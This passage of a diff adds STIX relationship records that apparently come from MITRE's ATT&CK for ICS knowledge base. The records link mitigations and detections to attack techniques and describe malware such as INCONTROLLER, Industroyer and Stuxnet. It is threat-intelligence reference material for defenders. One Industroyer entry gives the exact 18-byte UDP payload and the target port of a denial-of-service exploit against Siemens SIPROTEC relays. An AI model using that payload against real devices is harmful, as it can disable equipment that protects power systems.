"relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.202Z", + "relationship_type": "mitigates", + "description": "Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.\n", + "source_ref": "course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b363cbbb-679c-47e0-8ad0-af98ebf51e60", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.236Z", + "relationship_type": "mitigates", + "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications.\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--1f785984-791e-4612-be32-9ee6903a9c0b", + "created": "2022-09-28T20:26:09.928Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.433Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can login to Omron PLCs using hardcoded credentials, which is documented in CVE-2022-34151.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", 
+ "id": "relationship--3da977ab-c863-4e6f-a5b7-68173160da00", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with firmware activation or updating activity.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3be8045a-1f0d-4460-a76b-ae830e74c1e0", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:52:05.598Z", + "description": "The name of the [Industroyer](https://attack.mitre.org/software/S0604) payload DLL is supplied by the attackers via a command line parameter supplied in one of the main backdoors execute a shell command commands. 
(Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d854cc38-adf7-485d-96b5-70606f6cb87e", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:24:28.935Z", + "description": "Network allowlists can be implemented through either host-based files or system host files to specify what external connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in the [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--64db6a39-64d2-4999-97d7-91c28c32f42e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.101Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent 
devices from sending unauthorized command or reporting messages. Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--edf73653-b2d7-422f-b433-b6a428ff12d4", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017", + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov 2017, October 27 Bad Rabbit Ransomware Retrieved. 2019/10/27 ", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:21.210Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) is disguised as an Adobe Flash installer. When the file is opened it starts locking the infected computer. 
(Citation: Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8b17ad46-b0cc-4766-9cae-eba32260d468", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.135Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 
2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6f0384e6-73c8-4fc7-bc0c-0a8c2bfa473d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.069Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices have limits on the number of simultaneous sessions they support.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--274994e7-1fe9-463a-9979-46c72107bf9b", + "created": "2023-03-30T18:56:47.685Z", + "revoked": false, + "external_references": [ + { + "source_name": "ESET", + "description": "ESET ACAD/Medre.A: 10000s of AutoCAD Designs Leaked in Suspected Industrial Espionage Retrieved. 2021/04/13 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/ESET_ACAD_Medre_A_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:56:47.685Z", + "description": "[ACAD/Medre.A](https://attack.mitre.org/software/S1000) collects information related to the AutoCAD application. 
The worm collects AutoCAD (*.dwg) files with drawings from infected systems. (Citation: ESET)", + "relationship_type": "uses", + "source_ref": "malware--a4a98eab-b691-45d9-8c48-869ef8fefd57", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55", + "created": "2022-09-27T18:41:43.617Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T18:41:43.617Z", + "description": "Collecting information from the I/O image requires analyzing the application program running on the PLC for specific data block reads. Detecting this requires obtaining and analyzing a PLC’s application program, either directly from the device or from asset management platforms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5d0a7979-0420-4fd1-b5ad-cb5565cbdf9d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.094Z", + "relationship_type": "mitigates", + "description": "System and process restarts should be performed when a 
timeout condition occurs.\n", + "source_ref": "course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a22fabd2-836e-4141-9219-c76cc10138ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.100Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7f3ab726-ca49-4d47-b2b5-6246c6e4fdd3", + "created": "2022-09-26T15:24:07.122Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:24:07.122Z", + "description": "Monitor asset application logs which may provide information about requests for points or tags. Look for anomalies related to reading point or tag data, such as new assets using these functions, changes in volume or timing, or unusual information being queried. Many devices provide multiple ways to achieve the same result (e.g., functions with/without an acknowledgment or functions that operate on a single point vs. multiple points). Monitor for changes in the functions used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ccae6e5d-8a9e-4bab-ae77-26a2bd722f67", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 
2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:19:13.497Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) infects OB1 so that its malicious code sequence is executed at the start of a cycle. It also infects OB35. OB35 acts as a watchdog, and on certain conditions, it can stop the execution of OB1. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4211c12a-57cf-4ebb-910a-6af7aa09cf34", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.187Z", + "relationship_type": "mitigates", + "description": "All communication sessions to remote services should be authenticated to prevent unauthorized access.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9ad74496-e164-4068-a0f5-379f507ba864", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:23.576Z", + "description": "Monitor for logon behavior that may abuse credentials of existing accounts as a means of gaining Lateral Movement or Persistence. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dda29418-9570-405a-b7db-97e951e5aa53", + "created": "2022-09-26T19:36:13.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:35:58.409Z", + "description": "Monitor application logs for changes to settings and other events associated with network protocols and other services commonly abused for AiTM.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--636baf5a-1a1c-476b-bc54-fb27b27b58a2", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 
"modified": "2022-09-27T16:53:22.510Z", + "description": "Monitor for file names that are mismatched between the file name on disk and that of the binary's metadata. This is a likely indicator that a binary was renamed after it was compiled. For added context on adversary procedures and background see [Masquerading](https://attack.mitre.org/techniques/T1036) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--50c20664-75dc-451e-b026-67b1d309e4b5", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:16:50.062Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) SIPROTEC DoS module exploits the CVE-2015-5374 vulnerability in order to render a Siemens SIPROTEC device unresponsive. Once this vulnerability is successfully exploited, the target device stops responding to any commands until it is rebooted manually. (Citation: Anton Cherepanov, ESET June 2017) Once the tool is executed it sends specifically crafted packets to port 50,000 of the target IP addresses using UDP. 
The UDP packet contains the following 18 byte payload: 0x11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--66af47d7-c430-4ac9-8020-fd79b7059037", + "created": "2022-09-28T20:28:03.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. 
Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.440Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can perform a UDP multicast scan of UDP port 27127 to identify Schneider PLCs that use that port for the NetManage protocol.(Citation: Dragos-Pipedream)(Citation: Wylie-22)\n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the FINS (Factory Interface Network Service) protocol to scan for and obtain MAC address associated with Omron devices.(Citation: CISA-AA22-103A)(Citation: Wylie-22)\n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to perform scans for TCP port 4840 to identify devices running OPC UA servers.(Citation: Wylie-22)", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f951d934-d555-45e9-a564-27b84518cae4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.070Z", + "relationship_type": "mitigates", + "description": "Unauthorized connections can be prevented by statically defining the hosts and ports used for automation protocol connections.\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": 
"attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b13417ea-d8da-497f-818f-d2d90562039a", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:44:13.707Z", + "description": "Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--26fdd07e-d194-4f8e-a9af-d5b2f1d0222e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.170Z", + "relationship_type": "mitigates", + "description": "Restrict root or administrator access on user accounts to limit the ability to capture promiscuous traffic on a network through common packet capture tools. 
(Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--01b4a92f-da42-4dfa-8d59-53709b65940e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Limit privileges of user accounts and groups so that only authorized administrators can change service states and configurations.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8dab113a-a713-499b-ba1e-9c2cbeffb3c8", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:52:31.059Z", + "description": "Device restarts and shutdowns may be 
